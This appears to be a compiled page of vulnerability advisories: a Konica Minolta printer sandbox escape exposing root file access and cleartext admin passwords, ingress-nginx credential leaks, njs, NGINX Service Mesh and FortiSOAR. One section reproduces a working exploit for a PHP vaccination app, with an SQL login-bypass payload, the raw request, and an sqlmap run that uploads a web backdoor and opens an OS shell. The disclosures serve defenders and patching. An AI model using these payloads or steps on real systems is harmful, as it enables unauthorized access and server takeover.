Konica Minolta bizhub MFP devices before 2022-04-14 use cleartext password storage for the /var/log/nginx/html/ADMINPASS and /etc/shadow files.

CVE-2022-29588: Konica Minolta bizhub MFP Printer Terminal Sandbox Escape ≈ Packet Storm

Konica Minolta bizhub MFP devices before 2022-04-14 have an internal Chromium browser that executes with root (aka superuser) access privileges.

Title

Sandbox Escape with Root Access & Clear-text passwords

Product

Multiple Konica Minolta bizhub MFP Printer Terminals

Vulnerable Version

see vulnerable / tested versions below

Fixed Version

see solution section below

CVE Number

CVE-2022-29586, CVE-2022-29587, CVE-2022-29588

By

Werner Schober (Office Vienna) Johannes Kruchem (Office Vienna) SEC Consult Vulnerability Lab

Multiple Konica Minolta MFP bizhub devices, as well as devices from other manufacturers with the same firmware, are vulnerable to a sandbox breakout via the internal browser that displays the help menus. The browser itself is started with root privileges, which allows access to the complete file system. A file in the file system contained the administrator password for the printer's web interface in plain text.

**Vendor description**

_"Konica Minolta is a Japanese multinational technology company headquartered in Marunouchi, Chiyoda, Tokyo, with offices in 49 countries worldwide. The company manufactures business and industrial imaging products, including copiers, laser printers, multi-functional peripherals (MFPs) and digital print systems for the production printing market. Konica Minolta's Managed Print Service (MPS) is called Optimised Print Services. The company also makes optical devices, including lenses and LCD film; medical and graphic imaging products, such as X-ray image processing systems, colour proofing systems, and X-ray film; photometers, 3-D digitizers, and other sensing products; and textile printers."_ 

Source: https://en.wikipedia.org/wiki/Konica\_Minolta 

**Business recommendation**

Konica Minolta provided a patch of the firmware and operating system very quickly at the start of the year 2020. For most of the devices this firmware update must be manually applied by service technicians as a remote service platform for remote firmware updates is not fully rolled out yet. Multiple COVID-19 lockdowns delayed this patching process of over hundreds of thousands of devices drastically. 

In case you didn't receive an update yet, approach your Konica Minolta contact. 

SEC Consult recommends to perform a thorough security review conducted by security professionals to identify and resolve all security issues. Furthermore, it is necessary to implement secure software design early in the development life cycle and adapt secure patch management procedures through an ISMS. 

SEC Consult also published a blog post titled "**Someone call the patch manager - how COVID-19 left hundreds of thousands of printers vulnerable**" containing a practical example of a possible attack vector. 

**Vulnerability overview/description****1) Sandbox Escape on the Physical Printer Touch Screen Terminal (CVE-2022-29586) **

A touch screen terminal is attached to the printer in order to manage print jobs, create new scans, simply copy a page or to configure the device. The touch screen terminal hosts a user interface, which is based upon a proprietary application. 

By opening certain applications and/or settings via the terminal, it was possible to observe a slight change in the look and feel of the user interface itself. It was quickly determined that this was the result of context change, meaning that the applications running are not solely based on the proprietary application only. 

After attaching a keyboard to one of the multiple USB ports of the printer and pressing specific key combinations, it was possible to determine that some application parts are running an ordinary Chromium browser in "kiosk mode", which can be escaped easily, although most of the key combinations were blacklisted. This allows an attacker to get full access to the underlying printer's operating-  and file system, including configuration files, passwords in clear text, proprietary scripts and many more. 

**2) Terminal UI/Chromium running as root (CVE-2022-29587) **

It was determined that the printer UI and the Chromium browser are running with root privileges after escaping the printer terminal's sandbox. This allows an attacker to get full access to all files and folders on the operating system.  

**3) Passwords stored in clear text on the file system (CVE-2022-29588) **

Multiple passwords in clear-text were found on the file system of the printer. 

This includes: 

*   Unix User Account Passwords 
*   Printer Administrative Passwords 

Examples can be found in the following proof of concept section.  

**Proof of concept**

The referenced screenshots in this advisory can be found in our blog post.

**1) Sandbox Escape on the Physical Printer Touch Screen Terminal (CVE-2022-29586)  **

The following steps are necessary to get full access to the printer's operating system. It is necessary to have physical access to the device and "User Authentication" must be used and "Public User Access" must be enabled on the device.   

**Step 1 - Public User Access **

The attacker has access as "Public User" to the device.  The button is marked red in "step1.jpg". 

**Step 2 - Utility **

An attacker has to click on the button called "Utility" in the user interface which should be open after step 1. The button is marked red in "step2.jpg". 

**Step 3 - Utility again **

An attacker has to click on the slightly different "Utility" button again in the next window. The button is marked red in "step3.jpg". 

**Step 4 – Accessing Chromium **

A slight change in the design of the user interface can be observed after clicking on the "Utility" button marked red in the step above. The reason for that is that the application, which is now visible, is launched inside of a Chromium browser in kiosk mode. The loaded web application in Chromium can be seen in image "step4.jpg". 

**Step 5 – Attaching a keyboard **

A keyboard has to be attached to the printer to breakout of the terminal's sandbox and get access to the operating system. This can be done directly via the USB port available on all printers. 

**Step 6 – Access Chromium Developer Console **

Most of the shortcuts available on a normal Linux operating system are blocked or crash the printer terminal, but it was still possible to get full access to the system by pressing the key F12, which opened up the Chromium developer console. This can be seen in "step6.jpg". 

**Step 7 – Accessing the file system **

The tab sources in the Chromium developer tools can be used to get full file system access. Arbitrary folders can be added and read by clicking on "Add folder to workspace".

For example, the folder /var/log/nginx/html/ got added to Chromium, which revealed a lot of interesting files. The probably most interesting one is the file called "ADMINPASS" containing the printer's administrator account password in cleartext. 

**2) Terminal UI/Chromium running as root  (CVE-2022-29587)  **

Files such as /etc/shadow can be accessed with the root user's permissions. 

**3) Passwords stored in clear text on the file system  (CVE-2022-29588)  **

The following files containing clear text passwords were identified on the printer's file system: 

**3.1) /etc/shadow **

The shadow file contained the password of the user ORDBMS. No passwords were set for other users. 

**3.2) /var/log/nginx/html/ADMINPASS **

This file contains the password for the printer's web interface. Another file with sensitive content was found in /var/log/nginx/html. The "ADMINPASS" file contained the administrator's password for the printer's terminal/web interface in clear text. 

**Vulnerable / tested versions**

According to Konica Minolta, 46 bizhub MFP models are affected. The number of affected  devices in the field are in the hundreds of thousands worldwide according to the vendor.  These devices are also re-branded and sold by other companies. 

The vulnerabilities have been tested on the following devices: 

*   C3350i 
*   C3300i 

**Konica Minolta provided the following list of affected models / versions: **

​Model name

Affected FW version

CVE-ID

bizhub 227, 287, 367, 308, 368, 458, 558, 758, 808, 958, PRO958, 308e, 368e, 458e, 558e, 658e, 4752, 4052, C227, C287, C258, C308, C368, C458, C558, C658, C659, C759, C3351, C3851, C3851FS

G00-U8 or later

CVE-2022-29586 CVE-2022-29587

bizhub C450i, C550i, C650i

G00-73 or later

CVE-2022-29586 CVE-2022-29587

bizhub C250i, C300i, C360i, C4050i, C3350i, C4000i, C3300i

G00-73 or later

CVE-2022-29586 CVE-2022-29587

bizhub C250i, C300i, C360i, C4050i, C3350i, C4000i, C3300i

Gxx-4A or prior

CVE-2022-29586 CVE-2022-29587 CVE-2022-29588

bizhub 306i, 226i, 246i, 266i, C3320i

Gxx-4A or prior

CVE-2022-29588 CVE-2022-29587 CVE-2022-29586

**Vendor contact timeline:**

2020-01-16

Contacting vendor through "KONICA MINOLTA PSIRT Vulnerability Report Form"

2020-01-16

Vendor responds with GPG public key for psirt@konicaminolta.com

2020-01-16

Forwarding encrypted advisory to Konica Minolta PSIRT

2020-01-29

Update from Konica Minolta PSIRT - The reported vulnerabilities were successfully reviewed and will be patched in a future firmware release. The release date will be provided soon.

2020-2022

Postponing release multiple times as the remote service platform for remote firmware updates has not been rolled out for most devices yet and hundreds of thousands of printers have to be patched manually on-site during the COVID-19 pandemic.

2022-04-13

Requesting status update from Konica Minolta PSIRT.

2022-04-14

Konica Minolta PSIRT responds by stating that all devices directly affected have already been patched.

2022-04-25

Sending security advisory draft to vendor for review.

2022-05-09

Konica Minolta provides a list of affected models and feedback.

2022-05-10

Receiving further feedback, adjusting advisory.

2022-05-12

Coordinated release of security advisory

**Solution**

Konica Minolta already provided a patch of the firmware and operating system at the start of the year 2020 that must be applied by service technicians manually on-site at all of their customer locations. Most affected devices don't have a remote service platform for remote firmware updates yet. If your service technician hasn't patched your system yet, schedule an appointment. 

It has to be noted that Konica Minolta tried to patch most of their printers as soon as possible, which is not an easy task due to the large amount of affected printers and their manual procedure during the COVID-19 pandemic with multiple lockdowns. 

Konica Minolta provided the following list of models with fixed FW versions: 

Model name

Fixed FW version

bizhub 227, 287, 367, 308, 368, 458, 558,758, 808, 958, PRO958, 308e, 368e, 458e,558e, 658e, 4752, 4052, C227, C287, C258, C308, C368, C458, C558, C658, C659, C759,C3351, C3851, C3851FS

GC2-X4 or later

bizhub C550i, C650i

G00-2B or later

bizhub C250i, C450i, C300i, C360i, C4050i, C3350i, C4000i, C3300i

G00-7B or later

bizhub C3320i

G00-4D or later

bizhub 306i, 226i, 246i, 266i

G00-4F or later

**Workaround**

The following hardening/workaround is available and was provided directly from Konica Minolta. 

*   Disable the use of the external USB keyboard by "Customer Administrator" setting. 
*   In addition, it is strongly recommended to change the Customer Admin password to a new one. 

**Advisory URL**

https://sec-consult.com/vulnerability-lab/ 

EOF Werner Schober, Johannes Kruchem / @2022 

_Interested to work with the experts of SEC Consult? Send us your application_

_Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices_

CVE-2022-29587: Sandbox Escape with Root Access & Clear-text passwords in Konica Minolta bizhub MFP Printer Terminals

Nginx NJS v0.7.2 was discovered to contain a segmentation violation via njs_lvlhsh_bucket_find at njs_lvlhsh.c.

Permalink

Browse files

Fixed njs\_vmcode\_interpreter() when "toString" conversion fails.

Previously, while interpreting a user function, njs\_vmcode\_interpreter()
might return prematurely when an error happens.  This is not correct
because the current frame has to be unwound (or exception caught)
first.

The fix is exit through only 5 appropriate exit points to ensure
proper unwinding.

This closes #467 issue on Github.

*   Loading branch information

Showing with **13 additions** and **6 deletions**.

1.  +8 −6 src/njs\_vmcode.c
2.  +5 −0 src/test/njs\_unit\_test.c

CVE-2022-29369: Fixed njs_vmcode_interpreter() when "toString" conversion fails. · nginx/njs@222d6fd

A security issue was discovered in ingress-nginx where a user that can create or update ingress objects can use the spec.rules[].http.paths[].path field of an Ingress object (in the networking.k8s.io or extensions API group) to obtain the credentials of the ingress-nginx controller. In the default configuration, that credential has access to all secrets in the cluster.

**Issue Details**

A security issue was discovered in ingress-nginx where a user that can create or update ingress objects can use the spec.rules[].http.paths[].path field of an Ingress object (in the networking.k8s.io or extensions API group) to obtain the credentials of the ingress-nginx controller. In the default configuration, that credential has access to all secrets in the cluster.

This issue has been rated **High** (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L), and assigned **CVE-2021-25745**.

**Affected Components and Configurations**

This bug affects ingress-nginx. If you do not have ingress-nginx installed on your cluster, you are not affected. You can check this by running kubectl get po -n ingress-nginx.

Multitenant environments where non-admin users have permissions to create Ingress objects are most affected by this issue.

**Affected Versions**

*   <v1.2.0

**Fixed Versions**

*   v1.2.0-beta.0
*   v1.2.0

**Mitigation**

If you are unable to roll out the fix, this vulnerability can be mitigated by implementing an admission policy that restricts the spec.rules[].http.paths[].path field on the networking.k8s.io/Ingress resource to known safe characters (see the newly added rules, or the suggested value for annotation-value-word-blocklist).

**Detection**

If you find evidence that this vulnerability has been exploited, please contact security@kubernetes.io  
Additional Details  
See ingress-nginx Issue #8502 for more details.

**Acknowledgements**

This vulnerability was reported by Gafnit Amiga.

Thank You,  
CJ Cullen on behalf of the Kubernetes Security Response Committee

CVE-2021-25745: CVE-2021-25745: Ingress-nginx `path` can be pointed to service account token file · Issue #8502 · kubernetes/ingress-nginx

A security issue was discovered in ingress-nginx where a user that can create or update ingress objects can use .metadata.annotations in an Ingress object (in the networking.k8s.io or extensions API group) to obtain the credentials of the ingress-nginx controller. In the default configuration, that credential has access to all secrets in the cluster.

**CJ Cullen**

unread,

Apr 22, 2022, 6:31:38 PMApr 22

to kubernete...@googlegroups.com, kubernetes-dev, kubernetes-sec...@googlegroups.com, kubernetes-se...@googlegroups.com, distributo...@kubernetes.io, kubernetes+a...@discoursemail.com

**Issue Details**

A security issue was discovered in ingress-nginx where a user that can create or update ingress objects can use \`.metadata.annotations\` in an Ingress object (in the \`networking.k8s.io\` or \`extensions\` API group) to obtain the credentials of the ingress-nginx controller. In the default configuration, that credential has access to all secrets in the cluster.

This issue has been rated High (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L), and assigned CVE-2021-25746.

**Affected Components and Configurations**

This bug affects ingress-nginx. If you do not have ingress-nginx installed on your cluster, you are not affected. You can check this by running \`kubectl get po -n ingress-nginx\`.

Multitenant environments where non-admin users have permissions to create Ingress objects are most affected by this issue.

**Affected Versions**

*   <v1.2.0
    

**Fixed Versions**

*   v1.2.0-beta.0
    
*   v1.2.0
    

**Mitigation**

If you are unable to roll out the fix, this vulnerability can be mitigated by implementing an admission policy that restricts the \`metadata.annotations\` values to known safe (see the newly added rules, or the suggested value for annotation-value-word-blocklist).

**Detection**

If you find evidence that this vulnerability has been exploited, please contact secu...@kubernetes.io

**Additional Details**

See ingress-nginx Issue #8503 for more details.

**Acknowledgements**

This vulnerability was reported by Anthony Weems, and separately by jeffrey&oliver.

Thank You,

CJ Cullen on behalf of the Kubernetes Security Response Committee

CVE-2021-25746: [Security Advisory] CVE-2021-25746: Ingress-nginx directive injection via annotations

**CJ Cullen**

unread,

Apr 22, 2022, 6:31:38 PM (13 days ago) Apr 22

to kubernete...@googlegroups.com, kubernetes-dev, kubernetes-sec...@googlegroups.com, kubernetes-se...@googlegroups.com, distributo...@kubernetes.io, kubernetes+a...@discoursemail.com

**Issue Details**

A security issue was discovered in ingress-nginx where a user that can create or update ingress objects can use \`.metadata.annotations\` in an Ingress object (in the \`networking.k8s.io\` or \`extensions\` API group) to obtain the credentials of the ingress-nginx controller. In the default configuration, that credential has access to all secrets in the cluster.

This issue has been rated High (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L), and assigned CVE-2021-25746.

**Affected Components and Configurations**

This bug affects ingress-nginx. If you do not have ingress-nginx installed on your cluster, you are not affected. You can check this by running \`kubectl get po -n ingress-nginx\`.

Multitenant environments where non-admin users have permissions to create Ingress objects are most affected by this issue.

**Affected Versions**

*   <v1.2.0
    

**Fixed Versions**

*   v1.2.0-beta.0
    
*   v1.2.0
    

**Mitigation**

If you are unable to roll out the fix, this vulnerability can be mitigated by implementing an admission policy that restricts the \`metadata.annotations\` values to known safe (see the newly added rules, or the suggested value for annotation-value-word-blocklist).

**Detection**

If you find evidence that this vulnerability has been exploited, please contact secu...@kubernetes.io

**Additional Details**

See ingress-nginx Issue #8503 for more details.

**Acknowledgements**

This vulnerability was reported by Anthony Weems, and separately by jeffrey&oliver.

Thank You,

CJ Cullen on behalf of the Kubernetes Security Response Committee

Sourcecodester Covid-19 Directory on Vaccination System 1.0 is vulnerable to SQL Injection via cmdcategory.

    # Exploit Title: Covid-19 Directory on Vaccination System 1.0 - SQLi Authentication Bypass# Date: 28/03/2022# Exploit Author: Saud Alenazi# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/15244/design-and-implementation-covid-19-directory-vacination.html# Version: 1.0# Tested on: XAMPP, Linux1- Go to following url. >> http://localhost/covid-19-vaccination/admin/login.php2- We can login succesfully with SQL bypass method.**** Username = admin ' or "a" or '**** password = anything ###############################################POST /covid-19-vaccination/admin/login.php HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 63Origin: http://localhostConnection: closeReferer: http://localhost/covid-19-vaccination/admin/login.phpCookie: PHPSESSID=dras0itihsadtdkkkv7gv4hf67Upgrade-Insecure-Requests: 1txtusername=admin+%27+or+%22a%22+or+%27&txtpassword=1&btnlogin=--------------------------# Exploit Title: Covid-19 Directory on Vaccination System 1.0 - 'cmdcategory' SQL Injection# Date: 28/03/2022# Exploit Author: Saud Alenazi# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/15244/design-and-implementation-covid-19-directory-vacination.html# Version: 1.0# Tested on: XAMPP, LinuxThe Covid-19 Directory on Vaccination System is vulnerable to SQL Injection that leads to Remote Code Execution.Sqlmap command :sqlmap -u 'http://localhost/covid-19-vaccination/hospital.php?cmdcategory=Private' -p cmdcategory --risk=3 --level=5 --threads=10 --keep-alive --os-shell Now you have a web shell uploaded to the server :sqlmap -u 'http://localhost/covid-19-vaccination/hospital.php?cmdcategory=Private' -p cmdcategory --risk=3 --level=5 --threads=10 --keep-alive --os-shell         ___       __H__                                                                                                                                                  ___ ___[,]_____ ___ ___  {1.6.3#stable}                                                                                                                     |_ -| . [.]     | .'| . |                                                                                                                                    |___|_  [,]_|_|_|__,|  _|                                                                                                                                          |_|V...       |_|   https://sqlmap.org                                                                                                                 [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 00:35:27 /2022-03-28/[00:35:31] [INFO] resuming back-end DBMS 'mysql' [00:35:31] [INFO] testing connection to the target URLsqlmap resumed the following injection point(s) from stored session:---Parameter: cmdcategory (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: cmdcategory=Private') AND 3773=3773-- fUxB    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: cmdcategory=Private') AND (SELECT 9765 FROM (SELECT(SLEEP(5)))DnRk)-- LWnB---[00:35:32] [INFO] the back-end DBMS is MySQLweb application technology: PHP 8.1.2, Apache 2.4.52back-end DBMS: MySQL 5 (MariaDB fork)[00:35:32] [INFO] going to use a web backdoor for command prompt[00:35:32] [INFO] fingerprinting the back-end DBMS operating system[00:35:32] [INFO] the back-end DBMS operating system is Linuxwhich web application language does the web server support?[1] ASP[2] ASPX[3] JSP[4] PHP (default)> 4do you want sqlmap to further try to provoke the full path disclosure? [Y/n] n[00:36:09] [WARNING] unable to automatically retrieve the web server document rootwhat do you want to use for writable directory?[1] common location(s) ('/var/www/, /var/www/html, /var/www/htdocs, /usr/local/apache2/htdocs, /usr/local/www/data, /var/apache2/htdocs, /var/www/nginx-default, /srv/www/htdocs, /usr/local/var/www') (default)[2] custom location(s)[3] custom directory list file[4] brute force search> 2please provide a comma separate list of absolute directory paths: /opt/lampp/htdocs/covid-19-vaccination/[00:36:30] [WARNING] unable to automatically parse any web server path[00:36:30] [INFO] trying to upload the file stager on '/opt/lampp/htdocs/covid-19-vaccination/' via LIMIT 'LINES TERMINATED BY' method[00:36:30] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)[00:36:30] [WARNING] if the problem persists please try to lower the number of used threads (option '--threads')[00:36:31] [INFO] the file stager has been successfully uploaded on '/opt/lampp/htdocs/covid-19-vaccination/' - http://localhost:80/covid-19-vaccination/tmpumlrg.php[00:36:31] [WARNING] unable to upload the file through the web file stager to '/opt/lampp/htdocs/covid-19-vaccination/'[00:36:31] [WARNING] backdoor has not been successfully uploaded through the file stager possibly because the user running the web server process has not write privileges over the folder where the user running the DBMS process was able to upload the file stager or because the DBMS and web server sit on different serversdo you want to try the same method used for the file stager? [Y/n] y[00:36:33] [INFO] the backdoor has been successfully uploaded on '/opt/lampp/htdocs/covid-19-vaccination/' - http://localhost:80/covid-19-vaccination/tmpbwipl.php[00:36:33] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTERos-shell>

CVE-2022-28530: Covid-19 Directory On Vaccination System 1.0 SQL Injection ≈ Packet Storm

On all versions 1.3.x (fixed in 1.4.0) NGINX Service Mesh control plane endpoints are exposed to the cluster overlay network. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated

CVE-2022-27495

An improper access control in Fortinet FortiSOAR before 7.2.0 allows unauthenticated attackers to access gateway API data via crafted HTTP GET requests.

IR Number

FG-IR-22-041

Date

May 3, 2022

Severity

     Medium

CVSSv3 Score

6.8

Impact

Information disclosure

CVE ID

CVE-2022-23443

Affected Products

FortiSOAR : 7.0.2, 7.0.1, 7.0.0, 6.4.4, 6.4.3, 6.4.1, 6.4.0

CVRF

Download

*    Refine Search

** PSIRT Advisories**

**FortiSOAR - Improper access control on gateway API**

**Summary**

An improper access control vulnerability \[CWE-284\] in FortiSOAR may allow an unauthenticated attacker to access gateway API data via crafted HTTP GET requests.

**Affected Products**

FortiSOAR versions 7.0.2 and below,   
FortiSOAR versions 6.4.4 and below,  
FortiSOAR versions 6.0.0,  
FortiSOAR versions 5.x.x

**Solutions**

Please upgrade to FortiSOAR version 7.2.0 or above.

OR

Install a security patch to fix this vulnerability on FortiSOAR affected versions as follows:  
SSH to your FortiSOAR VM and log in as a root user.  
Download the security patch file from the repository server using the following command:  
wget https://update.cybersponse.com/patches/nginx-security-patch /> Update the permissions of the file and run the following commands to apply the patch:  
sudo chmod 755 nginx-security-patch  
sudo ./nginx-security-patch

**Acknowledgement**

Internally discovered and reported by the FortiSOAR development team.

Tag

#nginx